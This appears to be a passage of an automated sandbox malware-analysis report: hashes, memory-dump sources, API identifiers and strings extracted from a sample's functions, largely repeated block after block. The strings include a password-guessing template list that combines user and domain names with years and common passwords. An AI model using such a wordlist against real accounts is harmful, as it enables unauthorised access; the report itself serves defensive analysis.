                                            • Opcode ID: b4330e56959ee462ed1205fda9ac7683176cd5f26063ffa8ef68a2c8a5f0f074
                                            • Instruction ID: 1db09c36f4f0f0835bf3f672bae9c8733eaa5c3e2b6580af18a19802579e6250
                                            • Opcode Fuzzy Hash: b4330e56959ee462ed1205fda9ac7683176cd5f26063ffa8ef68a2c8a5f0f074
                                            • Instruction Fuzzy Hash: 90413672B8466542FE54CF53E2B4A787621EB50BD0F45A032CD1BA3BD4CE38D856C340
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 111b21ec5f7e9fe89f880ee9ac4213b8864fcd8f08edf6f79dc78a0803816fc1
                                            • Instruction ID: 70b5c5ae43b5a1029a1c52ab7d8d5885726637b6cb76b1e394ba678a50795f74
                                            • Opcode Fuzzy Hash: 111b21ec5f7e9fe89f880ee9ac4213b8864fcd8f08edf6f79dc78a0803816fc1
                                            • Instruction Fuzzy Hash: E8218FCBE5DBD54AF75346640CB52682FE09AA791075E80E7CE54972C3AC4D2C06A321
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 35e9cfd55fad44d67fc5b1c831561c77de6b5ecf399b73572e2a8deed26753c2
                                            • Instruction ID: 24d58c7984bad3e667918bcf079366c86fcc69f6f0ebb014c7b9da2cc9bd84c1
                                            • Opcode Fuzzy Hash: 35e9cfd55fad44d67fc5b1c831561c77de6b5ecf399b73572e2a8deed26753c2
                                            • Instruction Fuzzy Hash: 0AD0EC8BCAEED505F26786140CB92791FC09BA6905B0D41FACD58AA183BC092C816242
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: memcpy$FreeHeap
                                            • String ID: ; filena$=utf-8''$\$me="$name*=ut
                                            • API String ID: 4250714341-264635638
                                            • Opcode ID: b85989d0aa7393741c012d2dedc65c6a970050f8376302ff7d6575fe1b5fe43a
                                            • Instruction ID: ce021c1cf84f8c2d02e3572413fc82a396b026db48944355505e7aa3486b908a
                                            • Opcode Fuzzy Hash: b85989d0aa7393741c012d2dedc65c6a970050f8376302ff7d6575fe1b5fe43a
                                            • Instruction Fuzzy Hash: 9222C032A1DBC282DA10CB02E6943AAB761FB95BC4F584075EE8EA3B59DF3DD045D700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: ErrorLast$FreeHeap$EnvironmentVariable
                                            • String ID: at ThreadId$<unknown>
                                            • API String ID: 3745898529-2978829458
                                            • Opcode ID: c0a6135ba622bc8b74a35ba35bbe3113de816915c050ea76ab2813dbab21af33
                                            • Instruction ID: 9500cba1f50138c1896fbbf4c3b151f1603815ec2649c73ec0ef6410ad702b11
                                            • Opcode Fuzzy Hash: c0a6135ba622bc8b74a35ba35bbe3113de816915c050ea76ab2813dbab21af33
                                            • Instruction Fuzzy Hash: 45424C36A04B8599E721CF64E8A43E837B0FB4478CF544165EE8CA7B99DF79D289C340
                                            APIs
                                            Strings
                                            • %domain%%user%abc%user%abc123%domain%2016%domain%2015%domain%2014%domain%2013%domain%2012%domain%2011%domain%2010%domain%2009%domain%2008%domain%2007%domain%2006%domain%2005%domain%2004%domain%2003%domain%2002%domain%2001%domain%2000%user%2014%user%2013%user%2, xrefs: 00007FF6543A60C6, 00007FF6543A6134
                                            • _..., xrefs: 00007FF6543A6209
                                            • %user%roottnqwertyqwertyuiqwertyuiop%domain%2022%domain%2023%domain%2024%domain%2021%domain%2020%user%@2020%domain%@2021%domain%@20201020301234teste%user%123123%user%%user%321321%user%123%domain%%user%1234%domain%1234123456%domain%%user%abc%user%abc123%domain%, xrefs: 00007FF6543A618E, 00007FF6543A62A8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap$memcpy
                                            • String ID: %domain%%user%abc%user%abc123%domain%2016%domain%2015%domain%2014%domain%2013%domain%2012%domain%2011%domain%2010%domain%2009%domain%2008%domain%2007%domain%2006%domain%2005%domain%2004%domain%2003%domain%2002%domain%2001%domain%2000%user%2014%user%2013%user%2$%user%roottnqwertyqwertyuiqwertyuiop%domain%2022%domain%2023%domain%2024%domain%2021%domain%2020%user%@2020%domain%@2021%domain%@20201020301234teste%user%123123%user%%user%321321%user%123%domain%%user%1234%domain%1234123456%domain%%user%abc%user%abc123%domain%$_...
                                            • API String ID: 1887603139-2523241062
                                            • Opcode ID: a8536d2da8715dc60e35740d55811387e9f5af5bbfce0404f94fb10b5dd66eb0
                                            • Instruction ID: 9a5a2411172dffc270e16785d4ae879e8a5b4f877f94045476877a2b3dd85d85
                                            • Opcode Fuzzy Hash: a8536d2da8715dc60e35740d55811387e9f5af5bbfce0404f94fb10b5dd66eb0
                                            • Instruction Fuzzy Hash: 6E91743150CA8281EA10DB53E4A43BAA7A0FF89BC4F584175EE8DA7BA9DF7DD145C700
                                            APIs
                                            Strings
                                            • %domain%%user%abc%user%abc123%domain%2016%domain%2015%domain%2014%domain%2013%domain%2012%domain%2011%domain%2010%domain%2009%domain%2008%domain%2007%domain%2006%domain%2005%domain%2004%domain%2003%domain%2002%domain%2001%domain%2000%user%2014%user%2013%user%2, xrefs: 00007FF6543A60C6, 00007FF6543A6134
                                            • _..., xrefs: 00007FF6543A6209
                                            • %user%roottnqwertyqwertyuiqwertyuiop%domain%2022%domain%2023%domain%2024%domain%2021%domain%2020%user%@2020%domain%@2021%domain%@20201020301234teste%user%123123%user%%user%321321%user%123%domain%%user%1234%domain%1234123456%domain%%user%abc%user%abc123%domain%, xrefs: 00007FF6543A618E, 00007FF6543A62A8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap$memcpy
                                            • String ID: %domain%%user%abc%user%abc123%domain%2016%domain%2015%domain%2014%domain%2013%domain%2012%domain%2011%domain%2010%domain%2009%domain%2008%domain%2007%domain%2006%domain%2005%domain%2004%domain%2003%domain%2002%domain%2001%domain%2000%user%2014%user%2013%user%2$%user%roottnqwertyqwertyuiqwertyuiop%domain%2022%domain%2023%domain%2024%domain%2021%domain%2020%user%@2020%domain%@2021%domain%@20201020301234teste%user%123123%user%%user%321321%user%123%domain%%user%1234%domain%1234123456%domain%%user%abc%user%abc123%domain%$_...
                                            • API String ID: 1887603139-2523241062
                                            • Opcode ID: ab054a7b629e2ecba0b10f277ee43bc81f32064e6361292c17fea32afa35dbe8
                                            • Instruction ID: 9f4b51be4e147a705a7c8b8bf38b069d6ecbfe783b68493f7425c967dadd4e95
                                            • Opcode Fuzzy Hash: ab054a7b629e2ecba0b10f277ee43bc81f32064e6361292c17fea32afa35dbe8
                                            • Instruction Fuzzy Hash: 2A81753150CB8281EA10DB53E4A43AAA7A0FF85BC8F584175EE8DA7BA9DF7DD145C700
                                            APIs
                                            Strings
                                            • %domain%%user%abc%user%abc123%domain%2016%domain%2015%domain%2014%domain%2013%domain%2012%domain%2011%domain%2010%domain%2009%domain%2008%domain%2007%domain%2006%domain%2005%domain%2004%domain%2003%domain%2002%domain%2001%domain%2000%user%2014%user%2013%user%2, xrefs: 00007FF6543A60C6, 00007FF6543A6134
                                            • _..., xrefs: 00007FF6543A6209
                                            • %user%roottnqwertyqwertyuiqwertyuiop%domain%2022%domain%2023%domain%2024%domain%2021%domain%2020%user%@2020%domain%@2021%domain%@20201020301234teste%user%123123%user%%user%321321%user%123%domain%%user%1234%domain%1234123456%domain%%user%abc%user%abc123%domain%, xrefs: 00007FF6543A618E, 00007FF6543A62A8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap$memcpy
                                            • String ID: %domain%%user%abc%user%abc123%domain%2016%domain%2015%domain%2014%domain%2013%domain%2012%domain%2011%domain%2010%domain%2009%domain%2008%domain%2007%domain%2006%domain%2005%domain%2004%domain%2003%domain%2002%domain%2001%domain%2000%user%2014%user%2013%user%2$%user%roottnqwertyqwertyuiqwertyuiop%domain%2022%domain%2023%domain%2024%domain%2021%domain%2020%user%@2020%domain%@2021%domain%@20201020301234teste%user%123123%user%%user%321321%user%123%domain%%user%1234%domain%1234123456%domain%%user%abc%user%abc123%domain%$_...
                                            • API String ID: 1887603139-2523241062
                                            • Opcode ID: 786c2f37b11df70c33051a52db6d414989f1dd90b003dbb811e497428c2119bc
                                            • Instruction ID: bc59eace54bde7df65731498305a3ad3bb199c85ed0be65099db7a2617c911f9
                                            • Opcode Fuzzy Hash: 786c2f37b11df70c33051a52db6d414989f1dd90b003dbb811e497428c2119bc
                                            • Instruction Fuzzy Hash: B481A73160CB8241E610DB13E4A03AAA7A1FF85BD8F584175EE8DA7BAADF7DD145C700
                                            APIs
                                            Strings
                                            • %domain%%user%abc%user%abc123%domain%2016%domain%2015%domain%2014%domain%2013%domain%2012%domain%2011%domain%2010%domain%2009%domain%2008%domain%2007%domain%2006%domain%2005%domain%2004%domain%2003%domain%2002%domain%2001%domain%2000%user%2014%user%2013%user%2, xrefs: 00007FF6543A60C6, 00007FF6543A6134
                                            • _..., xrefs: 00007FF6543A6209
                                            • %user%roottnqwertyqwertyuiqwertyuiop%domain%2022%domain%2023%domain%2024%domain%2021%domain%2020%user%@2020%domain%@2021%domain%@20201020301234teste%user%123123%user%%user%321321%user%123%domain%%user%1234%domain%1234123456%domain%%user%abc%user%abc123%domain%, xrefs: 00007FF6543A618E, 00007FF6543A62A8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap$memcpy
                                            • String ID: %domain%%user%abc%user%abc123%domain%2016%domain%2015%domain%2014%domain%2013%domain%2012%domain%2011%domain%2010%domain%2009%domain%2008%domain%2007%domain%2006%domain%2005%domain%2004%domain%2003%domain%2002%domain%2001%domain%2000%user%2014%user%2013%user%2$%user%roottnqwertyqwertyuiqwertyuiop%domain%2022%domain%2023%domain%2024%domain%2021%domain%2020%user%@2020%domain%@2021%domain%@20201020301234teste%user%123123%user%%user%321321%user%123%domain%%user%1234%domain%1234123456%domain%%user%abc%user%abc123%domain%$_...
                                            • API String ID: 1887603139-2523241062
                                            • Opcode ID: cfc81fddac244cbc205c3b36ae2d026995658d999d4e8a6a23d195ca3b158689
                                            • Instruction ID: b7795df48eec2bfe1640329aa40182764bcb39c6f22542d03b05a2715e9e0593
                                            • Opcode Fuzzy Hash: cfc81fddac244cbc205c3b36ae2d026995658d999d4e8a6a23d195ca3b158689
                                            • Instruction Fuzzy Hash: AF81643160CA8281EA10DB53E4A43AAA7A0FF85BC4F584175EECDA7BA9DF7DD145C700
                                            APIs
                                            Strings
                                            • %domain%%user%abc%user%abc123%domain%2016%domain%2015%domain%2014%domain%2013%domain%2012%domain%2011%domain%2010%domain%2009%domain%2008%domain%2007%domain%2006%domain%2005%domain%2004%domain%2003%domain%2002%domain%2001%domain%2000%user%2014%user%2013%user%2, xrefs: 00007FF6543A60C6, 00007FF6543A6134
                                            • _..., xrefs: 00007FF6543A6209
                                            • %user%roottnqwertyqwertyuiqwertyuiop%domain%2022%domain%2023%domain%2024%domain%2021%domain%2020%user%@2020%domain%@2021%domain%@20201020301234teste%user%123123%user%%user%321321%user%123%domain%%user%1234%domain%1234123456%domain%%user%abc%user%abc123%domain%, xrefs: 00007FF6543A618E, 00007FF6543A62A8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap$memcpy
                                            • String ID: %domain%%user%abc%user%abc123%domain%2016%domain%2015%domain%2014%domain%2013%domain%2012%domain%2011%domain%2010%domain%2009%domain%2008%domain%2007%domain%2006%domain%2005%domain%2004%domain%2003%domain%2002%domain%2001%domain%2000%user%2014%user%2013%user%2$%user%roottnqwertyqwertyuiqwertyuiop%domain%2022%domain%2023%domain%2024%domain%2021%domain%2020%user%@2020%domain%@2021%domain%@20201020301234teste%user%123123%user%%user%321321%user%123%domain%%user%1234%domain%1234123456%domain%%user%abc%user%abc123%domain%$_...
                                            • API String ID: 1887603139-2523241062
                                            • Opcode ID: 4c335b88360e9950bd81d9c53b8e60504c3f0023a94399746c5b84e1a1e08281
                                            • Instruction ID: 68dbd2bc03d29cd941fe239e1a282282ad8a5af06e74172ce27779a9ae87f526
                                            • Opcode Fuzzy Hash: 4c335b88360e9950bd81d9c53b8e60504c3f0023a94399746c5b84e1a1e08281
                                            • Instruction Fuzzy Hash: E981753150CA8281EA10DB53E4A43AAA7A0FF85BC4F584175EECDA7BA9DF7DD145C700
                                            APIs
                                            Strings
                                            • %domain%%user%abc%user%abc123%domain%2016%domain%2015%domain%2014%domain%2013%domain%2012%domain%2011%domain%2010%domain%2009%domain%2008%domain%2007%domain%2006%domain%2005%domain%2004%domain%2003%domain%2002%domain%2001%domain%2000%user%2014%user%2013%user%2, xrefs: 00007FF6543A60C6, 00007FF6543A6134
                                            • _..., xrefs: 00007FF6543A6209
                                            • %user%roottnqwertyqwertyuiqwertyuiop%domain%2022%domain%2023%domain%2024%domain%2021%domain%2020%user%@2020%domain%@2021%domain%@20201020301234teste%user%123123%user%%user%321321%user%123%domain%%user%1234%domain%1234123456%domain%%user%abc%user%abc123%domain%, xrefs: 00007FF6543A618E, 00007FF6543A62A8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap$memcpy
                                            • String ID: %domain%%user%abc%user%abc123%domain%2016%domain%2015%domain%2014%domain%2013%domain%2012%domain%2011%domain%2010%domain%2009%domain%2008%domain%2007%domain%2006%domain%2005%domain%2004%domain%2003%domain%2002%domain%2001%domain%2000%user%2014%user%2013%user%2$%user%roottnqwertyqwertyuiqwertyuiop%domain%2022%domain%2023%domain%2024%domain%2021%domain%2020%user%@2020%domain%@2021%domain%@20201020301234teste%user%123123%user%%user%321321%user%123%domain%%user%1234%domain%1234123456%domain%%user%abc%user%abc123%domain%$_...
                                            • API String ID: 1887603139-2523241062
                                            • Opcode ID: a4fa7fbc9ee72d0c16ba1558b673a430dbbba7253f82dd39d69eb376f278f1e3
                                            • Instruction ID: b7d932b13cf2d633dcf7d0c0d53c5dea9973718eb49686c51e35ff2217c56d9a
                                            • Opcode Fuzzy Hash: a4fa7fbc9ee72d0c16ba1558b673a430dbbba7253f82dd39d69eb376f278f1e3
                                            • Instruction Fuzzy Hash: 8881743150CA8281EA10DB53E4A43AAA7A0FF85BC4F584175EECDA7BA9DF7DD145C700
                                            APIs
                                            Strings
                                            • %domain%%user%abc%user%abc123%domain%2016%domain%2015%domain%2014%domain%2013%domain%2012%domain%2011%domain%2010%domain%2009%domain%2008%domain%2007%domain%2006%domain%2005%domain%2004%domain%2003%domain%2002%domain%2001%domain%2000%user%2014%user%2013%user%2, xrefs: 00007FF6543A60C6, 00007FF6543A6134
                                            • _..., xrefs: 00007FF6543A6209
                                            • %user%roottnqwertyqwertyuiqwertyuiop%domain%2022%domain%2023%domain%2024%domain%2021%domain%2020%user%@2020%domain%@2021%domain%@20201020301234teste%user%123123%user%%user%321321%user%123%domain%%user%1234%domain%1234123456%domain%%user%abc%user%abc123%domain%, xrefs: 00007FF6543A618E, 00007FF6543A62A8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap$memcpy
                                            • String ID: %domain%%user%abc%user%abc123%domain%2016%domain%2015%domain%2014%domain%2013%domain%2012%domain%2011%domain%2010%domain%2009%domain%2008%domain%2007%domain%2006%domain%2005%domain%2004%domain%2003%domain%2002%domain%2001%domain%2000%user%2014%user%2013%user%2$%user%roottnqwertyqwertyuiqwertyuiop%domain%2022%domain%2023%domain%2024%domain%2021%domain%2020%user%@2020%domain%@2021%domain%@20201020301234teste%user%123123%user%%user%321321%user%123%domain%%user%1234%domain%1234123456%domain%%user%abc%user%abc123%domain%$_...
                                            • API String ID: 1887603139-2523241062
                                            • Opcode ID: 724cdf0fdece14a161a2e43e53ef38e1f33d038afb1f96a4147c9e7097756762
                                            • Instruction ID: df5c924d9c25e74642d4e4664b043102c90b342593305884dba55aed8ea92c49
                                            • Opcode Fuzzy Hash: 724cdf0fdece14a161a2e43e53ef38e1f33d038afb1f96a4147c9e7097756762
                                            • Instruction Fuzzy Hash: FF81743150CA8281EA10DB53E4A43AAA7A0FF85BC4F584175EECDA7BA9DF7DD145C700
                                            APIs
                                            Strings
                                            • %domain%%user%abc%user%abc123%domain%2016%domain%2015%domain%2014%domain%2013%domain%2012%domain%2011%domain%2010%domain%2009%domain%2008%domain%2007%domain%2006%domain%2005%domain%2004%domain%2003%domain%2002%domain%2001%domain%2000%user%2014%user%2013%user%2, xrefs: 00007FF6543A60C6, 00007FF6543A6134
                                            • _..., xrefs: 00007FF6543A6209
                                            • %user%roottnqwertyqwertyuiqwertyuiop%domain%2022%domain%2023%domain%2024%domain%2021%domain%2020%user%@2020%domain%@2021%domain%@20201020301234teste%user%123123%user%%user%321321%user%123%domain%%user%1234%domain%1234123456%domain%%user%abc%user%abc123%domain%, xrefs: 00007FF6543A618E, 00007FF6543A62A8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
